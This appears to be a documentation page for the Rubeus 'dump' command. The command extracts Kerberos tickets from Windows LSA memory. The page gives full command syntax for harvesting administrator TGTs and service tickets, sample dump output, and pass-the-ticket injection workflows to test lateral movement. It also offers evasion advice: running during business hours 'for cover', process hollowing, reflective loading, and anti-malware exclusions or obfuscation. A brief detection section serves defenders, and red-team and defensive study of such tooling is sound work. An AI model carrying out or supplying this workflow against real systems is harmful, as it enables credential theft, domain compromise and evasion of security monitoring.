dump

The dump command provides comprehensive Kerberos ticket extraction capabilities from system memory, supporting both targeted and bulk harvesting operations across user sessions.

Memory Extraction

Extract tickets directly from LSA memory structures

Multi-Session Support

Access tickets across all user sessions when elevated

Flexible Filtering

Target specific users, services, or session IDs

Export Ready

Base64-encoded output ready for injection or analysis

Overview

Extract all current Kerberos tickets from memory on the local system. This command provides comprehensive ticket harvesting capabilities, extracting both TGTs and service tickets for offline analysis and reuse.

Basic Syntax
Targeted Extraction
Output Options

# Basic ticket extraction
Rubeus.exe dump

# With filtering options
Rubeus.exe dump [/luid:LUID] [/user:username] [/service:servicename] [/server:servername] [/nowrap]

# Extract from specific session
Rubeus.exe dump /luid:0x12345

# Extract for specific user
Rubeus.exe dump /user:administrator

# Extract specific service tickets
Rubeus.exe dump /service:krbtgt

# Standard wrapped output
Rubeus.exe dump

# Unwrapped for easy copy/paste
Rubeus.exe dump /nowrap

# Combined with filtering
Rubeus.exe dump /service:cifs /nowrap

Parameters

Hide Session Targeting

luid

string

Show Logon Session ID Details

Target specific logon session ID (requires elevation)Format: Hexadecimal value (e.g., 0x3e7, 0x12345)Use Cases:

Extract from specific user sessions
Target administrative sessions
Focus on service account sessions

Discovery: Use logonsession command to enumerate available LUIDs

Show Content Filtering

user

string

Show Username Filter Details

Filter tickets by username (case-insensitive)Examples:

administrator - Domain admin tickets
service_account - Service account tickets
DESKTOP-ABC123$ - Machine account tickets

Wildcards: Not supported - use exact username

service

string

Show Service Name Filter Details

Filter tickets by service name componentCommon Services:

krbtgt - Ticket Granting Tickets (TGTs)
cifs - File sharing services
http - Web services
ldap - Directory services
mssqlsvc - SQL Server services
host - Host-based services

Matching: Partial string matching supported

server

string

Show Server Name Filter Details

Filter tickets by target server nameExamples:

dc01.corp.local - Domain controller tickets
fileserver.corp.local - File server tickets
sql01 - Database server tickets

FQDN Support: Both short and fully qualified names

Show Output Formatting

nowrap

boolean

Show Base64 Output Formatting

Controls base64 encoding output formatDefault Behavior: Base64 output wrapped at 76 characters With /nowrap: Single-line base64 outputBenefits of /nowrap:

Easier copy/paste operations
Direct injection compatibility
Simplified scripting integration

Trade-offs: Less readable in terminal output

Basic Operations
Targeted Extraction
Server Targeting
Session Management

# Dump all tickets for current user
Rubeus.exe dump

# System-wide extraction (elevated)
Rubeus.exe dump

# Unwrapped output for injection
Rubeus.exe dump /nowrap

# Administrative accounts
Rubeus.exe dump /user:administrator
Rubeus.exe dump /user:"domain admin"

# Service accounts
Rubeus.exe dump /user:sqlservice
Rubeus.exe dump /user:iisapppool

# Machine accounts
Rubeus.exe dump /user:"DESKTOP-ABC$"

# Domain controllers
Rubeus.exe dump /server:dc01.corp.local
Rubeus.exe dump /server:pdc.corp.local

# File servers
Rubeus.exe dump /server:fileserver.corp.local
Rubeus.exe dump /server:shares.corp.local

# Application servers
Rubeus.exe dump /server:sql01.corp.local
Rubeus.exe dump /server:web01.corp.local

# System session (common LUIDs)
Rubeus.exe dump /luid:0x3e7     # SYSTEM
Rubeus.exe dump /luid:0x3e4     # NETWORK SERVICE
Rubeus.exe dump /luid:0x3e5     # LOCAL SERVICE

# User sessions (discovered via logonsession)
Rubeus.exe dump /luid:0x12345   # Interactive user
Rubeus.exe dump /luid:0x67890   # Service logon

Standard User
Elevated Context
SYSTEM Context

Available Operations

Extract current user tickets
Access current LUID only
View authenticated services
Export for analysis

Limitations

No other user sessions
No cross-LUID access
No system tickets
Limited session scope

Typical Extraction Scope:

User’s TGT (krbtgt ticket)
Service tickets for accessed resources
Cached authentication tickets
Current session credentials only

Use Cases:

Personal credential analysis
Current session assessment
Individual ticket extraction
Basic reconnaissance

Ticket Granting Tickets
Service Tickets
Special Tickets

TGT Characteristics

Service Pattern: krbtgt/DOMAIN.COMProperties:

Domain authentication proof
Service ticket request capability
Renewable based on policy
Session-specific encryption

Attack Value

Capabilities:

Request any domain service
Enable lateral movement
Support golden ticket creation
Facilitate pass-the-ticket

Hide TGT Analysis Details

Encryption Information:

AES256/AES128 in modern environments
RC4 in legacy or downgraded scenarios
Key derived from user password/hash

Validity Periods:

Default: 10 hours (configurable)
Renewable: Up to 7 days (default)
Maximum lifetime: Domain policy dependent

Usage Patterns:

One TGT per authentication session
Automatically renewed by Windows
Cached until session termination

File Services

CIFS/SMB Tickets:

cifs/server.domain.com
File share access
UNC path authentication
Network drive mapping

Web Services

HTTP/HTTPS Tickets:

http/server.domain.com
Web application access
IIS authentication
SharePoint/Exchange

Directory Services

LDAP Tickets:

ldap/dc.domain.com
Active Directory queries
Group membership checks
Administrative tools

Show Additional Service Types

Database Services:

mssqlsvc/sql.domain.com:1433 - SQL Server
oracle/db.domain.com - Oracle Database
mysql/db.domain.com - MySQL

Infrastructure Services:

host/server.domain.com - Generic host services
rpcss/server.domain.com - RPC services
dns/server.domain.com - DNS services

Specialized Services:

exchangemdb/mail.domain.com - Exchange
sharepoint/sp.domain.com - SharePoint
ftp/ftp.domain.com - FTP services

Show Attack Applications

Direct Access:

Use tickets for immediate service access
Bypass authentication mechanisms
Access resources without credentials

Silver Ticket Creation:

Extract service principal information
Use as template for forged tickets
Analyze encryption and flags

Lateral Movement:

Map service relationships
Identify accessible resources
Plan movement paths

Some ticket types provide elevated privileges or unique capabilities

Machine Account Tickets:

krbtgt/DOMAIN.COM for COMPUTER$ accounts
Inter-domain trust relationships
System service authentication
DCSync and other privileged operations

Delegation Tickets:

Constrained delegation tickets
Unconstrained delegation tickets
Resource-based constrained delegation
Protocol transition tickets

Administrative Tickets:

Domain admin TGTs
Enterprise admin tickets
Schema admin credentials
Backup operator tickets

Output Structure
Ticket Metadata
Sample Output
Flag Analysis

Action Header

string

Indicates the operation being performedExamples:

[*] Action: Dump Kerberos tickets (Current User)
[*] Action: Dump Kerberos tickets (All Users)
[*] Action: Dump Kerberos tickets (LUID: 0x12345)

Current LUID

hex

Current process logon session identifierFormat: [*] Current LUID : 0x[hexvalue]Common Values:

0x3e7 - SYSTEM session
0x3e4 - NETWORK SERVICE
0x3e5 - LOCAL SERVICE

Session Information

object

Authentication Details:

UserName - Account name (user, computer, service)
Domain - Authentication domain
LogonId - Session identifier (matches LUID)
UserSID - Security identifier
AuthenticationPackage - Kerberos, NTLM, etc.
LogonType - Interactive, Service, Network, etc.
LogonTime - Session establishment time
LogonServer - Authenticating domain controller
LogonServerDNSDomain - Domain FQDN
UserPrincipalName - UPN if available

Ticket Index

number

Sequential ticket number within sessionFormat: [0], [1], [2], etc.

Encryption Type

hex

Kerberos encryption algorithm identifierCommon Values:

0x12 - AES256-CTS-HMAC-SHA1-96
0x11 - AES128-CTS-HMAC-SHA1-96
0x17 - RC4-HMAC-MD5
0x03 - DES-CBC-MD5 (legacy)

Validity Period

datetime

Ticket timing informationFormat: Start/End/MaxRenew: [start] ; [end] ; [maxrenew]Components:

Start time - When ticket becomes valid
End time - When ticket expires
Max renew - Latest possible renewal time

Principal Names

string

Service and client identificationServer Name: Target service principal

Format: service/hostname@REALM
Example: krbtgt/CORP.LOCAL @ CORP.LOCAL

Client Name: Requesting principal

Format: username@REALM
Example: user @ CORP.LOCAL

Complete Dump Example

[*] Action: Dump Kerberos tickets (All Users)

[*] Current LUID    : 0x3e7

   UserName                 : DESKTOP-ABC123$
   Domain                   : CORP
   LogonId                  : 0x3e7
   UserSID                  : S-1-5-18
   AuthenticationPackage    : Kerberos
   LogonType                : Service
   LogonTime                : 1/15/2024 9:15:32 AM
   LogonServer              :
   LogonServerDNSDomain     : CORP.LOCAL
   UserPrincipalName        :

      [0] - 0x12 - aes256_cts_hmac_sha1
        Start/End/MaxRenew: 1/15/2024 9:15:32 AM ; 1/15/2024 7:15:32 PM ; 1/22/2024 9:15:32 AM
        Server Name       : krbtgt/CORP.LOCAL @ CORP.LOCAL
        Client Name       : DESKTOP-ABC123$ @ CORP.LOCAL
        Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (40a10000)

        doIFujCCBbagAwIBBaEDAgEWooIEyjCCBMZhggTCMIIEvqADAgEFoQwbCkNPUlAuTE9DQUw...

      [1] - 0x12 - aes256_cts_hmac_sha1
        Start/End/MaxRenew: 1/15/2024 9:16:15 AM ; 1/15/2024 7:15:32 PM ; 1/22/2024 9:15:32 AM
        Server Name       : cifs/fileserver.corp.local @ CORP.LOCAL
        Client Name       : DESKTOP-ABC123$ @ CORP.LOCAL
        Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (40a10000)

        doIFrjCCBaqgAwIBBaEDAgEWooIEnjCCBJphggSWMIIEkqADAgEFoQwbCkNPUlAuTE9DQUw...

Hide Ticket Flags Interpretation

Common Flag Values

hex

Standard Patterns:

40a10000 - Standard user TGT (renewable, forwardable)
40e10000 - Administrative TGT (additional privileges)
50a10000 - Delegation-enabled ticket
60a10000 - Highly privileged ticket

Flag Breakdown:

renewable - Can be renewed before expiration
forwardable - Can be forwarded to other services
forwarded - Has been forwarded from another ticket
proxiable - Can be used for proxy authentication
proxy - Is a proxy ticket
may_postdate - Can be post-dated
postdated - Is post-dated
invalid - Ticket is invalid
revokable - Can be revoked
trusted_for_delegation - Trusted for delegation
name_canonicalize - Name canonicalization allowed
pre_authent - Pre-authentication completed

Encryption Analysis

Modern Encryption
Legacy Encryption

AES256

Type: 0x12 - AES256-CTS-HMAC-SHA1-96Characteristics:

Strongest available encryption
Default in modern domains
FIPS 140-2 compliant
Preferred for security

AES128

Type: 0x11 - AES128-CTS-HMAC-SHA1-96Characteristics:

Strong encryption standard
Widely supported
Good performance balance
Acceptable for most environments

Legacy encryption types may indicate security weaknesses or attack opportunities

RC4

Type: 0x17 - RC4-HMAC-MD5Risks:

Weaker encryption algorithm
Vulnerable to certain attacks
May indicate legacy systems
Possible downgrade attack

DES

Type: 0x03 - DES-CBC-MD5Critical Issues:

Extremely weak encryption
Easily crackable
Legacy system indicator
Security vulnerability

Timing Analysis

Validity Period Assessment:

Compare start/end times for anomalies
Check for unusually long durations
Identify renewable vs. non-renewable tickets
Look for post-dated or future tickets

Renewal Patterns:

Standard TGT: 10 hours validity, 7 days renewable
Service tickets: 10 hours validity, not renewable
Anomalous patterns may indicate attacks

Principal Analysis

Service Principal Patterns:

krbtgt/* - Ticket Granting Tickets
cifs/* - File sharing access
host/* - General host services
http/* - Web service access
Custom SPNs for specialized services

Client Principal Assessment:

User accounts: username@DOMAIN
Machine accounts: COMPUTER$@DOMAIN
Service accounts: service@DOMAIN

Flag Interpretation

Hide Flag Analysis Matrix

Flag Value	Type	Delegation	Renewable	Forwardable	Risk Level
40a10000	Standard	No	Yes	Yes	Low
40e10000	Elevated	No	Yes	Yes	Medium
50a10000	Delegation	Yes	Yes	Yes	High
60a10000	Privileged	Advanced	Yes	Yes	Critical

Pass-the-Ticket
Intelligence Gathering
Persistence & Evasion

TGT Extraction & Reuse

# Extract all TGTs with clean output
Rubeus.exe dump /service:krbtgt /nowrap

# Extract from specific user session
Rubeus.exe dump /user:administrator /service:krbtgt /nowrap

# Extract from elevated session
Rubeus.exe dump /luid:0x12345 /service:krbtgt /nowrap

Service Ticket Reuse

# Extract specific service tickets
Rubeus.exe dump /service:cifs /server:fileserver.corp.local /nowrap
Rubeus.exe dump /service:http /server:web01.corp.local /nowrap
Rubeus.exe dump /service:ldap /server:dc01.corp.local /nowrap

Cross-Session Operations

Combine dump with session management for advanced scenarios

# Create new session context
Rubeus.exe createnetonly /program:cmd.exe

# Extract tickets from source session
Rubeus.exe dump /luid:0x[source] /nowrap

# Inject into new session
Rubeus.exe ptt /ticket:[BASE64] /luid:0x[target]

Service Discovery

Analyze extracted tickets to map:

Accessible file shares (cifs tickets)
Web applications (http tickets)
Database servers (mssqlsvc tickets)
Administrative interfaces (ldap tickets)

# Extract all service tickets for analysis
Rubeus.exe dump | findstr "Server Name"

Privilege Assessment

Evaluate ticket privileges:

Administrative account indicators
Delegation capabilities
Service account access
Cross-domain relationships

Key Indicators:

Multiple krbtgt tickets (admin access)
Delegation flags in tickets
High-privilege service access
Machine account tickets

Infrastructure Mapping

Build network topology from tickets:

Domain controllers (krbtgt, ldap services)
File servers (cifs services)
Application servers (http, mssqlsvc)
Infrastructure relationships

Ticket Harvesting Strategy

Selective Extraction

Focus on high-value tickets:

Administrative TGTs
Service account credentials
Cross-domain tickets
Delegation-enabled tickets

Timing Considerations

Optimize extraction timing:

Business hours for cover
After authentication events
Before ticket expiration
During system maintenance

Storage & Management

# Export tickets for offline storage
Rubeus.exe dump /nowrap > tickets.txt

# Organize by user/service
Rubeus.exe dump /user:admin /nowrap > admin_tickets.txt
Rubeus.exe dump /service:cifs /nowrap > file_tickets.txt

# Prepare for injection scripts
Rubeus.exe dump /service:krbtgt /nowrap | findstr "doIF" > tgts.txt

Operational Rotation

Ticket Lifecycle Management:

Regular extraction before expiration
Rotation of injected tickets
Cleanup of expired credentials
Renewal of high-value tickets

Detection Vectors
Evasion Strategies
Defensive Countermeasures

Rubeus dump operations can trigger multiple detection mechanisms

Hide API-Level Detection

Critical API Calls:

LsaCallAuthenticationPackage() - Primary ticket access
LsaEnumerateLogonSessions() - Session enumeration
LsaGetLogonSessionData() - Session information
OpenProcess() - Process access for elevation

Detection Signatures:

Non-LSASS processes calling LSA functions
Rapid sequence of authentication package calls
Cross-session ticket access patterns
Elevated privilege escalation attempts

Show Behavioral Analysis

Suspicious Patterns:

Bulk ticket extraction from multiple sessions
Enumeration of all logon sessions
Access to tickets outside normal scope
Extraction during off-hours or maintenance

Process Monitoring:

Parent-child process relationships
Command-line argument analysis
Network activity correlation
File system interaction patterns

Show Host-Based Indicators

System-Level Detection:

Memory access to LSA structures
Registry access patterns
Event log generation patterns
Anti-malware behavioral detection

Windows Event Logs:

Security log entries for logon sessions
Audit policy dependent events
Authentication package usage
Privilege use auditing

Targeted Operations

Selective Targeting

Focus Approach:

Extract specific high-value tickets only
Avoid system-wide bulk harvesting
Target known valuable sessions
Minimize unnecessary enumeration

Filtered Extraction

Precision Techniques:

Use specific user filters
Target individual services
Focus on single LUIDs
Avoid wildcard operations

# Good: Targeted extraction
Rubeus.exe dump /user:administrator /service:krbtgt

# Avoid: Bulk harvesting
Rubeus.exe dump

Timing & Context

Operational Windows:

Execute during business hours
Coincide with legitimate authentication
Follow normal user activity patterns
Avoid maintenance windows

Environmental Blending:

Use after legitimate logon events
Execute from expected user contexts
Maintain normal process hierarchies
Minimize detection surface

Technical Evasion

Process Management:

Run from legitimate parent processes
Use process hollowing or injection
Implement reflective loading
Avoid disk-based execution

Memory Considerations:

Minimize memory footprint
Clean up after extraction
Avoid persistent modifications
Use in-memory only operations

Access Issues
Data Issues
Output Issues

Privilege Problems

Symptoms:

“Access Denied” errors
Empty output despite tickets existing
LUID enumeration failures

Diagnosis:

# Check current privileges
whoami /priv

# Test with current user context
Rubeus.exe dump

# Verify LUID accessibility
Rubeus.exe logonsession

Solutions:

Run from elevated context
Use appropriate user session
Check process integrity level
Verify SeDebugPrivilege

Anti-Malware Interference

Common Indicators:

Process termination
API call blocking
Memory access failures
Behavioral detection alerts

Mitigation Approaches:

Use process exclusions
Implement custom obfuscation
Modify compilation parameters
Use alternative execution methods

No Tickets Found

Root Causes:

User not authenticated to domain
Tickets expired or manually purged
Incorrect filtering parameters
Network authentication not performed

Troubleshooting:

# Check authentication status
Rubeus.exe klist

# Verify domain connectivity
nltest /dsgetdc:domain.com

# Test without filters
Rubeus.exe dump

# Check specific LUID
Rubeus.exe dump /luid:0x3e7

Parsing Errors

Common Problems:

Corrupted ticket data in memory
Unsupported encryption algorithms
LSA subsystem inconsistencies
Memory layout changes

Resolution Steps:

Restart authentication services
Clear and regenerate tickets
Verify system integrity
Update Rubeus version

Formatting Problems

Symptoms:

Truncated base64 output
Encoding issues
Missing ticket sections
Garbled characters

Solutions:

# Use nowrap for clean output
Rubeus.exe dump /nowrap

# Redirect to file
Rubeus.exe dump > output.txt

# Focus on specific tickets
Rubeus.exe dump /service:krbtgt /nowrap

Performance Issues

Optimization Strategies:

Use specific filters to reduce scope
Target individual LUIDs
Avoid system-wide enumeration
Implement operational delays

Targeted Operations:

# Efficient targeted extraction
Rubeus.exe dump /user:administrator /service:krbtgt
Rubeus.exe dump /luid:0x12345 /nowrap

Reconnaissance Phase

Initial Assessment:

# Quick ticket overview
Rubeus.exe triage

# Session enumeration
Rubeus.exe logonsession

# Current user tickets
Rubeus.exe klist

Target Identification:

Identify high-value sessions
Locate administrative accounts
Map available services
Assess delegation opportunities

Targeted Extraction

Strategic Harvesting:

# Extract valuable TGTs
Rubeus.exe dump /service:krbtgt /nowrap

# Service-specific extraction
Rubeus.exe dump /service:cifs /nowrap

# User-targeted operations
Rubeus.exe dump /user:administrator /nowrap

Documentation:

Record extraction timestamps
Note ticket validity periods
Document source sessions
Track service relationships

Analysis & Validation

Ticket Assessment:

# Detailed ticket analysis
Rubeus.exe describe /ticket:[base64]

# Encryption validation
# Flag interpretation
# Principal verification

Quality Control:

Verify ticket integrity
Check expiration times
Validate service principals
Assess encryption strength

Utilization & Testing

Ticket Injection:

# Inject extracted tickets
Rubeus.exe ptt /ticket:[base64]

# Verify injection success
Rubeus.exe klist

# Test access capabilities
dir \\target.domain.com\share

Operational Testing:

Validate service access
Test lateral movement
Confirm privilege levels
Document successful paths

Quick Enumeration

triage - Fast ticket overview and session mapping

Detailed Listing

klist - Comprehensive current ticket analysis

Ticket Analysis

describe - Deep ticket structure examination

Ticket Injection

ptt - Pass extracted tickets to sessions

Real-time Monitoring

monitor - Continuous ticket capture

Automated Collection

harvest - Systematic ticket harvesting

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

Memory Extraction

Multi-Session Support

Flexible Filtering

Export Ready

Overview

Parameters

Available Operations

Limitations

Enhanced Capabilities

Additional Access

TGT Characteristics

Attack Value

File Services

Web Services

Directory Services

AES256

AES128

RC4

DES

Selective Extraction

Timing Considerations

Selective Targeting

Filtered Extraction

Quick Enumeration

Detailed Listing

Ticket Analysis

Ticket Injection

Real-time Monitoring

Automated Collection

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

Memory Extraction

Multi-Session Support

Flexible Filtering

Export Ready

​Overview

​Parameters

Available Operations

Limitations

Enhanced Capabilities

Additional Access

TGT Characteristics

Attack Value

File Services

Web Services

Directory Services

AES256

AES128

RC4

DES

Selective Extraction

Timing Considerations

Selective Targeting

Filtered Extraction

Quick Enumeration

Detailed Listing

Ticket Analysis

Ticket Injection

Real-time Monitoring

Automated Collection

Overview

Parameters